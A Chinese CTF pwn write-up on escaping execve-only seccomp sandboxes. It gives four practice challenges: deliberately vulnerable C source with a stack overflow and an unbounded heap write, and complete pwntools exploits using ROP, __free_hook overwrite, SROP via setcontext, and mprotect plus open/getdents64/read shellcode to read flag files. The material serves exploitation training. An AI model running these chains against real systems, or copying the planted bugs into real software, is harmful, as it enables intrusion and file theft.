pwn sandbox/orw总结

例题1 good(栈沙盒)

#include<stdio.h>
#include<fcntl.h>
#include<unistd.h>
#include<stddef.h>
#include<linux/seccomp.h>
#include<linux/filter.h>
#include<sys/prctl.h>    
#include<linux/bpf.h> 
#include<sys/types.h>



/*
 * Turn off stdio buffering on stdin, stdout and stderr (a null buffer
 * passed to setbuf() makes the stream unbuffered), so prompts and replies
 * are exchanged immediately.
 */
void init()
{
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);

}
/*
 * Install a seccomp-BPF filter on the calling process.
 *
 * The filter is a denylist: it kills the process on a non-x86_64 syscall
 * architecture or on syscall number 59 (execve on x86_64) and allows every
 * other syscall.
 *
 * NOTE(review): because only one syscall number is denied, file access
 * (open/read/write) stays available after a memory-corruption bug; that is
 * the point this page demonstrates. A hardened filter is normally written
 * as an allowlist of the syscalls the program needs.
 * NOTE(review): both prctl() return values are ignored, so a failed install
 * leaves the process running unfiltered without any diagnostic.
 */
void sandbox(){
        struct sock_filter filter[] = {
        // A = word at offset 4 of struct seccomp_data (the arch field)
        BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4),
        // arch == 0xc000003e (AUDIT_ARCH_X86_64): fall through; otherwise skip 2 -> KILL
        BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),
        // A = word at offset 0 of struct seccomp_data (the syscall number)
        BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
        // nr == 59: fall through to KILL; otherwise skip 1 -> ALLOW
        BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
        BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
        BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
        };
        struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
        .filter = filter,
        };
        // no_new_privs is set first; the filter is then installed in filter mode
        prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
        prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
}
/*
 * Entry point of the practice binary: disable buffering, install the
 * seccomp filter, print a banner and read one message from stdin.
 *
 * NOTE(review): buf holds 0x48 bytes but read() is allowed to store up to
 * 0x100, so input longer than the buffer overwrites the rest of the stack
 * frame. This is the intended bug of the exercise; the bounded form would
 * be read(0, buf, sizeof(buf)). The build line given on this page also
 * disables the stack protector and PIE.
 */
void main()
{
    init();
    sandbox();
    char buf[0x48];
    printf("%s\n","Today is a good day no right man?");
    // length argument (0x100) exceeds sizeof(buf) (0x48)
    read(0,buf,0x100);
}

思路

编译指令:gcc -fno-stack-protector -no-pie -o sandbox sandbox.c(关闭栈保护 canary 和 PIE,仅用于练习环境)
查看沙盒规则:seccomp-tools dump ./xxx(输出程序安装的 seccomp 过滤规则)

EXP

from pwn import *
r=process('./good')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf=ELF('./good')
context.log_level='debug'
'''
0x000000000040083c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040083e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400840 : pop r14 ; pop r15 ; ret
0x0000000000400842 : pop r15 ; ret
0x000000000040083b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040083f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004005f8 : pop rbp ; ret
0x0000000000400843 : pop rdi ; ret
0x0000000000400841 : pop rsi ; pop r15 ; ret 
0x000000000040083d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040053e : ret
0x0000000000400542 : ret 0x200a
0x0000000000400778 : ret 0x2be


'''
rdi=0x0000000000400843
rsi=0x0000000000400841
r.recv()
#puts(puts_got)
pay='a'*0x58+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x0400790)
r.sendline(pay)
leak=u64(r.recv(6)+'\x00'*2)
print(hex(leak))
libc_base=leak-libc.sym['puts']
print(hex(libc_base))
r.recv()
pay3='a'*0x58+p64(rdi)+p64(0)+p64(rsi)+p64(0x601200)+p64(0x40)+p64(libc_base+libc.sym['read'])+p64(0x0400790)
r.send(pay3)
r.send('flag')

r.recv()
pay1='a'*0x58+p64(rdi)+p64(0x2)+p64(rsi)+p64(0x601200)+p64(0)+p64(libc_base+libc.sym['syscall'])
pay1+=p64(rdi)+p64(3)+p64(rsi)+p64(0x601200)+p64(0x100)+p64(libc_base+libc.sym['read'])
pay1+=p64(rdi)+p64(0x601200)+p64(libc_base+libc.sym['puts'])+p64(0x0400790)
r.send(pay1)
print(r.recvuntil("}"))

例题2 orwheap(2.27/堆沙盒)

#include<stdio.h>
#include <math.h>
#include <stdio.h>
#include<unistd.h>
#include <dirent.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
/*
 * Install a seccomp-BPF filter on the calling process.
 *
 * The filter is a denylist: it kills the process on a non-x86_64 syscall
 * architecture or on syscall number 59 (execve on x86_64) and allows every
 * other syscall.
 *
 * NOTE(review): with a single denied syscall, file access and memory
 * permission changes stay available after a memory-corruption bug. A
 * hardened filter is normally an allowlist of the syscalls the program needs.
 * NOTE(review): both prctl() return values are ignored, so a failed install
 * leaves the process running unfiltered without any diagnostic.
 */
void sandbox(){
    struct sock_filter filter[] = {
    // A = word at offset 4 of struct seccomp_data (the arch field)
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4),
    // arch == 0xc000003e (AUDIT_ARCH_X86_64): fall through; otherwise skip 2 -> KILL
    BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),
    // A = word at offset 0 of struct seccomp_data (the syscall number)
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
    // nr == 59: fall through to KILL; otherwise skip 1 -> ALLOW
    BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
    .filter = filter,
    };
    // no_new_privs is set first; the filter is then installed in filter mode
    prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
    prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
}
/*
 * Switch stdin, stdout and stderr to mode 2 with no user buffer (2 is
 * _IONBF, unbuffered, on glibc). Returns the result of the last setvbuf().
 */
int init()
{
    setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  return setvbuf(stderr, 0LL, 2, 0LL);
}
// Number of live chunks; create() also uses it as the index of the next slot.
int num=0;
// Chunk pointers, 0x10 slots.
char *heaparray[0x10];
// Size requested for each slot when it was created.
size_t realsize[0x10];
/*
 * Menu option 1: read a size, malloc() a chunk of that size and store the
 * pointer and size at slot `num`, then increment `num`.
 *
 * NOTE(review): the limit checked here is 0x20 but heaparray and realsize
 * have 0x10 entries, so slots 0x10..0x1f are written out of bounds.
 * NOTE(review): `num` is a counter, not a free-slot index. dele()
 * decrements it for any freed slot, so the next create() can overwrite a
 * slot that still holds a live pointer.
 * NOTE(review): size is a signed int taken from input without validation,
 * and the malloc() result is neither checked nor cleared.
 */
void create(){
    if(num>=0x20)
    {
        puts("no more");
        return;
    }
    int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
    heaparray[num]=(char *)malloc(size);
    realsize[num]=size;
    num++;
   
    }
/*
 * Menu option 4: read an index and print the recorded size and the
 * contents of that chunk as a C string.
 *
 * NOTE(review): buf is filled with up to 4 bytes and passed to atoi()
 * without a terminating NUL.
 * NOTE(review): chunks are never cleared after malloc(), and %s prints
 * until the first NUL byte, so data left in recycled memory can be
 * disclosed. realsize[idx] is a size_t printed with %ld.
 */
void show(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);// read the chunk index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){// look the chunk up by index
        // print the contents of the selected chunk
        printf("Size : %ld\nContent : %s\n",realsize[idx],heaparray[idx]);
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
/*
 * Menu option 3: read an index and a length, then read that many bytes
 * from stdin into the chunk.
 *
 * NOTE(review): the length comes from input and is never compared with
 * realsize[idx], so a write can run past the end of the chunk (heap
 * overflow). This is the intended bug of the exercise; the bounded form
 * would cap the length at realsize[idx].
 */
void edit(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);// read the chunk index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){// validate the index
        puts("Out of bound!");
        _exit(0);
    }
  // the index is in range
    if(heaparray[idx]){
        int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
        printf("Content of heap : \n");
        // size is user-controlled and not checked against realsize[idx]
        read(0,heaparray[idx],size);
    // original note: fill the chunk via read_input (the code above calls read() directly)
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
/*
 * Menu option 2: read an index, free that chunk and clear its slot.
 *
 * The pointer is set to NULL after free(), so the slot itself does not
 * dangle.
 * NOTE(review): `num` is decremented whichever slot was freed, while
 * create() uses `num` as the next slot index; see create().
 */
void dele(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);// read the index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){// validate the chunk index
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){
        free(heaparray[idx]);// free the pointer stored in heaparray[idx]
        realsize[idx] = 0 ;
        heaparray[idx]=NULL;
        puts("Done !"); 
        num--;
    }else{
        puts("No such heap !");
    }
}
/* Print the four menu entries, one per line. */
void menu(void){
    puts("1.create");
    puts("2.dele");
    puts("3.edit");
    puts("4.show");
}
/*
 * Entry point: disable buffering, install the seccomp filter, then loop
 * forever showing the menu and dispatching on the number entered.
 *
 * NOTE(review): the scanf() return value is ignored, so on unparsable
 * input `choice` keeps its previous (initially uninitialized) value.
 */
void main()
{
    init();
    sandbox();
    int choice;
    while(1)
    {
        menu();
        scanf("%d",&choice);
        switch(choice)
        {
            case 1:create();break;
            case 2:dele();break;
            case 3:edit();break;
            case 4:show();break;
            default:puts("error");
        }
    }
}

思路

edit 可以写入任意长度:size 由用户输入,未与创建时记录的 realsize 比较,因此存在堆溢出
2.27 使用的是 setcontext+53,通过 rdi 指向的结构为各寄存器赋值
把 __free_hook 改写为 setcontext+53

EXP

from pwn import *
# Local practice binary for example 2; elf.libc is the libc it is linked against.
r=process('./orwheap18')
elf = ELF("orwheap18")
libc= elf.libc
# context.log_level='debug'
context.arch="amd64"
def add(size):
    """Choose menu entry 1 (create) and answer the size prompt with *size*."""
    for prompt, answer in (("4.show\n", '1'), ("Size of Heap : \n", str(size))):
        r.sendlineafter(prompt, answer)

def dele(idx):
    """Choose menu entry 2 (dele) and answer the index prompt with *idx*."""
    for prompt, answer in (("4.show\n", '2'), ("Index :\n", str(idx))):
        r.sendlineafter(prompt, answer)

def edit(idx,size,con):
    """Choose menu entry 3 (edit), give index and length, then send *con* raw."""
    line_prompts = (
        ("4.show\n", '3'),
        ("Index :\n", str(idx)),
        ("Size of Heap : \n", str(size)),
    )
    for prompt, answer in line_prompts:
        r.sendlineafter(prompt, answer)
    # The content is sent without a trailing newline.
    r.sendafter("Content of heap : \n", con)
def show(idx):
    """Choose menu entry 4 (show) and answer the index prompt with *idx*."""
    for prompt, answer in (("4.show\n", '4'), ("Index :\n", str(idx))):
        r.sendlineafter(prompt, answer)
def dbg():
    """Attach gdb to the target process and pause until the user continues."""
    gdb.attach(r)
    pause() 
# Walkthrough for example 2 (glibc 2.27). It relies on three properties of the
# challenge source: edit() does not bound the write length, show() prints
# uncleared chunk data, and the seccomp filter denies only execve.
# NOTE(review): __free_hook, which this flow depends on, was removed in glibc 2.34.
# NOTE(review): .next() and str(frame) below look like Python 2 era usage; confirm.

# Author's note: sizes above 0x420 do not go into tcache.
add(0x420)#0
add(0x420)#1
dele(0)
# dele() dropped the program's counter to 1, so this chunk is stored in slot 1.
add(0x90)
# Leak libc: show() prints data left behind in the recycled chunk.
show(1)
r.recvuntil("Content : ")
# 0x3ec090 is specific to the libc build used by the author.
base=u64(r.recv(6)+b'\x00'*2)-0x3ec090
print(hex(base))
for i in range(9):
    add(0x18)
dele(10)
dele(9)
dele(8)
dele(7)
dele(6)
dele(5)
dele(4)
dele(3)
free_hook=base+libc.sym['__free_hook']
# Author's note: modify the fd pointer in the fastbin.
# The unbounded edit() length lets chunk 2 overwrite the header and fd of the freed neighbour.
edit(2,0x666,b'a'*0x18+p64(0x21)+p64(free_hook-0x10))
for i in range(9):
    add(0x18)
setcontext= base + libc.symbols['setcontext']+53
syscall= base+next(libc.search(asm("syscall\nret")))
edit(11,0x100,p64(setcontext))# overwrite __free_hook

# Build the frame in a chunk (author: "construct above free_hook").
# Prepare the SROP frame.
fake_rsp = free_hook&0xfffffffffffff000
print(hex(fake_rsp))
frame = SigreturnFrame()
frame.rax=0
frame.rdi=0
frame.rsi=fake_rsp
frame.rdx=0x2000
frame.rsp=fake_rsp
frame.rip=syscall
add(0x500)
edit(12,0x500,str(frame))

# free() is the trigger: setcontext first jumps to rip to run read, then
# returns to the rsp value (that is, to the data written by that read).
dele(12)
prdi_ret = base+libc.search(asm("pop rdi\nret")).next()
prsi_ret = base+libc.search(asm("pop rsi\nret")).next()
prdx_ret = base+libc.search(asm("pop rdx\nret")).next()
prax_ret = base+libc.search(asm("pop rax\nret")).next()
jmp_rsp = base+libc.search(asm("jmp rsp")).next()
print("jmp"+hex(jmp_rsp))
mprotect_addr = base + libc.sym['mprotect']

# This payload lists the directory to find the name of the flag file.
payload = p64(prdi_ret)+p64(fake_rsp)
payload += p64(prsi_ret)+p64(0x1000)
payload += p64(prdx_ret)+p64(7)
payload += p64(prax_ret)+p64(10)
payload += p64(syscall) # mprotect(fake_rsp,0x1000,7): change permissions of fake_rsp..fake_rsp+0x1000
payload += p64(jmp_rsp)# run the shellcraft code that follows
payload += asm(shellcraft.open('./'))
payload += asm(shellcraft.getdents64(3,fake_rsp+0x300,0x100))
payload += asm(shellcraft.write(1,fake_rsp+0x300,0x100))
payload += asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (fake_rsp+0x100))# set registers, run read, then return to the location just written
r.send(payload)
r.recvuntil("flag")
name=r.recv(6)
print("name"+hex(name))
flag='flag'+name
r.recv()

# cat flag
shellcode = asm(shellcraft.cat(flag))
shellcode+= asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (fake_rsp+0x100))
r.send(shellcode)
print(r.recvuntil("}"))
r.interactive()

例题3 orwheap20(2.29/2.31堆沙盒)

#include<stdio.h>
#include <math.h>
#include <stdio.h>
#include<unistd.h>
#include <dirent.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/prctl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
/*
 * Install a seccomp-BPF filter on the calling process.
 *
 * The filter is a denylist: it kills the process on a non-x86_64 syscall
 * architecture or on syscall number 59 (execve on x86_64) and allows every
 * other syscall.
 *
 * NOTE(review): with a single denied syscall, file access and memory
 * permission changes stay available after a memory-corruption bug. A
 * hardened filter is normally an allowlist of the syscalls the program needs.
 * NOTE(review): both prctl() return values are ignored, so a failed install
 * leaves the process running unfiltered without any diagnostic.
 */
void sandbox(){
    struct sock_filter filter[] = {
    // A = word at offset 4 of struct seccomp_data (the arch field)
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,4),
    // arch == 0xc000003e (AUDIT_ARCH_X86_64): fall through; otherwise skip 2 -> KILL
    BPF_JUMP(BPF_JMP+BPF_JEQ,0xc000003e,0,2),
    // A = word at offset 0 of struct seccomp_data (the syscall number)
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),
    // nr == 59: fall through to KILL; otherwise skip 1 -> ALLOW
    BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
    .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])),
    .filter = filter,
    };
    // no_new_privs is set first; the filter is then installed in filter mode
    prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
    prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
}
/*
 * Switch stdin, stdout and stderr to mode 2 with no user buffer (2 is
 * _IONBF, unbuffered, on glibc). Returns the result of the last setvbuf().
 */
int init()
{
    setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  return setvbuf(stderr, 0LL, 2, 0LL);
}
// Number of live chunks; create() also uses it as the index of the next slot.
int num=0;
// Chunk pointers, 0x10 slots.
char *heaparray[0x10];
// Size requested for each slot when it was created.
size_t realsize[0x10];
/*
 * Menu option 1: read a size, malloc() a chunk of that size and store the
 * pointer and size at slot `num`, then increment `num`.
 *
 * NOTE(review): the limit checked here is 0x20 but heaparray and realsize
 * have 0x10 entries, so slots 0x10..0x1f are written out of bounds.
 * NOTE(review): `num` is a counter, not a free-slot index. dele()
 * decrements it for any freed slot, so the next create() can overwrite a
 * slot that still holds a live pointer.
 * NOTE(review): size is a signed int taken from input without validation,
 * and the malloc() result is neither checked nor cleared.
 */
void create(){
    if(num>=0x20)
    {
        puts("no more");
        return;
    }
    int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
    heaparray[num]=(char *)malloc(size);
    realsize[num]=size;
    num++;
   
    }
/*
 * Menu option 4: read an index and print the recorded size and the
 * contents of that chunk as a C string.
 *
 * NOTE(review): buf is filled with up to 4 bytes and passed to atoi()
 * without a terminating NUL.
 * NOTE(review): chunks are never cleared after malloc(), and %s prints
 * until the first NUL byte, so data left in recycled memory can be
 * disclosed. realsize[idx] is a size_t printed with %ld.
 */
void show(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);// read the chunk index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){// look the chunk up by index
        // print the contents of the selected chunk
        printf("Size : %ld\nContent : %s\n",realsize[idx],heaparray[idx]);
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
/*
 * Menu option 3: read an index and a length, then read that many bytes
 * from stdin into the chunk.
 *
 * NOTE(review): the length comes from input and is never compared with
 * realsize[idx], so a write can run past the end of the chunk (heap
 * overflow). This is the intended bug of the exercise; the bounded form
 * would cap the length at realsize[idx].
 */
void edit(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);// read the chunk index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){// validate the index
        puts("Out of bound!");
        _exit(0);
    }
  // the index is in range
    if(heaparray[idx]){
        int size;
    puts("Size of Heap : ");
    scanf("%d",&size);
        printf("Content of heap : \n");
        // size is user-controlled and not checked against realsize[idx]
        read(0,heaparray[idx],size);
    // original note: fill the chunk via read_input (the code above calls read() directly)
        puts("Done !");
    }else{
        puts("No such heap !");
    }
}
/*
 * Menu option 2: read an index, free that chunk and clear its slot.
 *
 * The pointer is set to NULL after free(), so the slot itself does not
 * dangle.
 * NOTE(review): `num` is decremented whichever slot was freed, while
 * create() uses `num` as the next slot index; see create().
 */
void dele(){
    int idx ;
    char buf[4];
    printf("Index :\n");
    read(0,buf,4);// read the index
    idx = atoi(buf);
    if(idx < 0 || idx >= 0x10){// validate the chunk index
        puts("Out of bound!");
        _exit(0);
    }
    if(heaparray[idx]){
        free(heaparray[idx]);// free the pointer stored in heaparray[idx]
        realsize[idx] = 0 ;
        heaparray[idx]=NULL;
        puts("Done !"); 
        num--;
    }else{
        puts("No such heap !");
    }
}
/* Print the four menu entries, one per line. */
void menu(void){
    puts("1.create");
    puts("2.dele");
    puts("3.edit");
    puts("4.show");
}
/*
 * Entry point: disable buffering, install the seccomp filter, then loop
 * forever showing the menu and dispatching on the number entered.
 *
 * NOTE(review): the scanf() return value is ignored, so on unparsable
 * input `choice` keeps its previous (initially uninitialized) value.
 */
void main()
{
    init();
    sandbox();
    int choice;
    while(1)
    {
        menu();
        scanf("%d",&choice);
        switch(choice)
        {
            case 1:create();break;
            case 2:dele();break;
            case 3:edit();break;
            case 4:show();break;
            default:puts("error");
        }
    }
}

思路

和2.27类似,但setcontext+61采用rdx传参,所以要借助一个gadget,结构有所变化

EXP

from pwn import *
# Local practice binary for example 3; elf.libc is the libc it is linked against.
r=process('overheap20')
elf = ELF("overheap20")
libc = elf.libc
context.log_level='debug'
context.arch="amd64"

#0x0000000000154930: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]; 
def add(size):
    """Choose menu entry 1 (create) and answer the size prompt with *size*."""
    for prompt, answer in (("4.show\n", '1'), ("Size of Heap : \n", str(size))):
        r.sendlineafter(prompt, answer)

def dele(idx):
    """Choose menu entry 2 (dele) and answer the index prompt with *idx*."""
    for prompt, answer in (("4.show\n", '2'), ("Index :\n", str(idx))):
        r.sendlineafter(prompt, answer)

def edit(idx,size,con):
    """Choose menu entry 3 (edit), give index and length, then send *con* raw."""
    line_prompts = (
        ("4.show\n", '3'),
        ("Index :\n", str(idx)),
        ("Size of Heap : \n", str(size)),
    )
    for prompt, answer in line_prompts:
        r.sendlineafter(prompt, answer)
    # The content is sent without a trailing newline.
    r.sendafter("Content of heap : \n", con)
def show(idx):
    """Choose menu entry 4 (show) and answer the index prompt with *idx*."""
    for prompt, answer in (("4.show\n", '4'), ("Index :\n", str(idx))):
        r.sendlineafter(prompt, answer)
def dbg():
    """Attach gdb to the target process and pause until the user continues."""
    gdb.attach(r)
    pause()

# Walkthrough for example 3 (glibc 2.29/2.31). It relies on the same source
# properties as example 2: edit() does not bound the write length, show()
# prints uncleared chunk data, and the seccomp filter denies only execve.
# NOTE(review): __free_hook, which this flow depends on, was removed in glibc 2.34.
# NOTE(review): .next(), str(frame) and payload="" look like Python 2 era usage; confirm.
add(0x420)
add(0x420)
dele(0)
# dele() dropped the program's counter to 1, so this chunk is stored in slot 1.
add(0x90)

# Leak libc: show() prints data left behind in the recycled chunk.
show(1)
r.recvuntil("Content : ")
# 0x1ebfd0 is specific to the libc build used by the author.
base=u64(r.recv(6)+b'\x00'*2)-0x1ebfd0
prdi_ret = base+libc.search(asm("pop rdi\nret")).next()
prsi_ret = base+libc.search(asm("pop rsi\nret")).next()
prdx_ret = base+libc.search(asm("pop rdx\nret")).next()
prax_ret = base+libc.search(asm("pop rax\nret")).next()
jmp_rsp = base+libc.search(asm("jmp rsp")).next()
mprotect_addr = base + libc.sym['mprotect']
print(hex(base))
for i in range(9):
    add(0x18)
dele(10)
dele(9)
dele(8)
dele(7)
dele(6)
dele(5)
dele(4)
dele(3)
free_hook=base+libc.sym['__free_hook']
# The unbounded edit() length lets chunk 2 overwrite the header and fd of the freed neighbour.
edit(2,0x666,b'a'*0x18+p64(0x21)+p64(free_hook-0x10))
for i in range(9):
    add(0x18)
# Everything up to here serves to get an allocation placed at __free_hook.

setcontext= base + libc.symbols['setcontext']+61
syscall= base+next(libc.search(asm("syscall\nret")))
fake_rsp = (free_hook&0xfffffffffffff000)
print(hex(fake_rsp))
shell1 = '''
    xor rdi,rdi
    mov rsi,%d
    mov edx,0x1000

    mov eax,0
    syscall

    jmp rsi
    ''' % fake_rsp
frame = SigreturnFrame()# SROP frame used with setcontext: rip goes to mprotect first, then ret continues at rsp
frame.rsp = base + libc.sym['__free_hook']+0x10
frame.rdi = fake_rsp
frame.rsi = 0x1000
frame.rdx = 7
frame.rip = base + libc.sym['mprotect']

# Leak a heap address here; the chunk came back from the tcache bin.
show(3)
r.recvuntil("Content : ")
frame_addr=u64(r.recv(6)+b'\x00'*2)+0x770# offset to where the frame is written later
print(hex(frame_addr))

# Point __free_hook at the gadget and lay out the context next to it.
rdxx=0x0000000000154930+base 
edit(11,0x300,p64(rdxx)+p64(0)+p64(base+libc.sym["__free_hook"]+0x18)+asm(shell1))
#0x0000000000154930: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
# gadget: loads rdx first (for the SROP frame), then transfers to setcontext
# after the frame is applied: ret to freehook+0x10 (freehook+0x18) -> asm(read)
payload1 = p64(0)+p64(frame_addr)# rdx is loaded from [rdi+0x8]
payload1 += p64(0)*4+p64(base+libc.sym["setcontext"]+61) + str(frame)[0x28:]# the first 0x28 bytes of the frame are empty

add(0x500)
edit(12,0x500,payload1)
dele(12)

# List the directory, then cat the flag file.
payload=""
payload += asm(shellcraft.open('./'))
payload += asm(shellcraft.getdents64(3,fake_rsp+0x300,0x100))
payload += asm(shellcraft.write(1,fake_rsp+0x300,0x100))
payload += asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (fake_rsp+0x100))
r.send(payload)
r.recvuntil("flag")
name=r.recv(6)
flag='flag'+name
shellcode = asm(shellcraft.cat(flag))
shellcode+= asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (fake_rsp+0x100))
r.send(shellcode)

r.interactive()

例题4 oldfashion_orw(栈沙盒)

image.png

泄露libc,改权限,bss上写入shellcode,运行后拿目录,然后重复一次orw拿flag,基本上改完权限就跑板子了,和上一道的区别就是改了权限用shellcode吧

EXP

from pwn import *
# Walkthrough for example 4 (stack-based). The challenge source appears on the
# page only as an image, so the notes below describe what this script sends.
# NOTE(review): str and bytes are mixed below ('a'*0x38 + p64(...)), which
# looks like Python 2 era usage; confirm before reuse.
context.log_level = 'debug'
context.arch='amd64'

# Short aliases around the process tube `p` (defined below).
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

p = process("vuln")
elf = ELF('vuln')
libc = elf.libc
# Gadget listing kept for reference; a bare string expression with no effect.
'''
0x0000000000401443: pop rdi; ret; 
0x0000000000401441: pop rsi; pop r15; ret;
0x000000000011c371: pop rdx; pop r12; ret; 
0x000000000040101a: ret;

'''
# Fixed binary addresses; they are only valid when the binary is not position independent.
pop_rdi = 0x0000000000401443
pop_rsi_r15 = 0x0000000000401441
ret = 0x000000000040101a
main = 0x401311
bss = 0x404000
# Stage 1: write(1, write@got, ...) prints a libc address, then returns to main.
payload = 'a'*0x38+p64(pop_rdi)+p64(1)
payload += p64(pop_rsi_r15)+p64(elf.got['write'])+p64(0)
payload += p64(elf.plt['write'])+p64(main)
p.recv()
# '-1' answers the first prompt (presumably the size prompt, judging by the
# commented-out lines below; confirm against the binary).
p.sendline('-1')
p.recv()
p.send(payload)
# p.sendlineafter('size?\n','-1') 
# p.sendafter('content?\n',payload)
ru('!\n')
libc_base = u64(p.recv(6)+'\x00'*2)-libc.sym['write']
lg('libc_base',libc_base)
pop_rdx_r12 = libc_base+0x000000000011c371
# Stage 2: mprotect(bss, 0x1000, 7), then return to main.
# The seccomp filter on this page denies only execve, so mprotect is allowed.
payload = 'a'*0x38+p64(pop_rdi)+p64(bss)
payload += p64(pop_rsi_r15)+p64(0x1000)+p64(0)
payload += p64(pop_rdx_r12)+p64(7)+p64(0)+p64(libc_base+libc.sym['mprotect'])
payload += p64(0x401311)

p.recv()
p.sendline('-1')
p.recv()
p.send(payload)
# p.sendlineafter('size?\n','-1') 
# p.sendafter('content?\n',payload)
# Stage 3: read(0, bss+0x200, 0x100), then return into bss+0x200.
poc = b'a'*0x38
poc += p64(pop_rdi)
poc += p64(0)
poc += p64(pop_rsi_r15)
poc += p64(bss+0x200)+p64(0)
poc += p64(pop_rdx_r12)
poc += p64(0x100)+p64(0)
poc += p64(libc_base+libc.sym['read'])
poc += p64(bss+0x200)

p.recv()
p.sendline('-1')
p.recv()
p.send(poc)
p.recv()
# First stub: open('./'), getdents64 and write list the directory. The trailer
# issues read(0, 0x401311, 0x100) and then jumps to 0x401311 (the value of `main`).
shellcode = b''
shellcode += asm(shellcraft.open('./'))
shellcode += asm(shellcraft.getdents64(3, bss+0x300, 0x100))
shellcode += asm(shellcraft.write(1,bss+0x300, 0x100))
shellcode += asm('''
        mov rdi, 0; mov rsi, 0x%x;mov rdx, 0x100;mov rax, 0; syscall; push rsi; ret;
        ''' % (0x401311))
p.send(shellcode)
flag=p.recvuntil("flag")
flagname=b'flag'+p.recv(20)
print((flagname))

# Stage 4: same read-and-return chain as stage 3, this time targeting bss+0x600.
poc=b'a'*0x38
poc += p64(pop_rdi)
poc += p64(0)
poc += p64(pop_rsi_r15)
poc += p64(bss+0x600)+p64(0)
poc += p64(pop_rdx_r12)
poc += p64(0x100)+p64(0)
poc += p64(libc_base+libc.sym['read'])
poc += p64(bss+0x600)
p.recv()
p.sendline('-1')
p.recv()
p.send(poc)
p.recv()
# Second stub: open the recovered file name, read from fd 4 and write the data to stdout.
shellcode = b''
shellcode += asm(shellcraft.open((flagname)))
shellcode += asm(shellcraft.read(4, bss+0x700, 0x400))
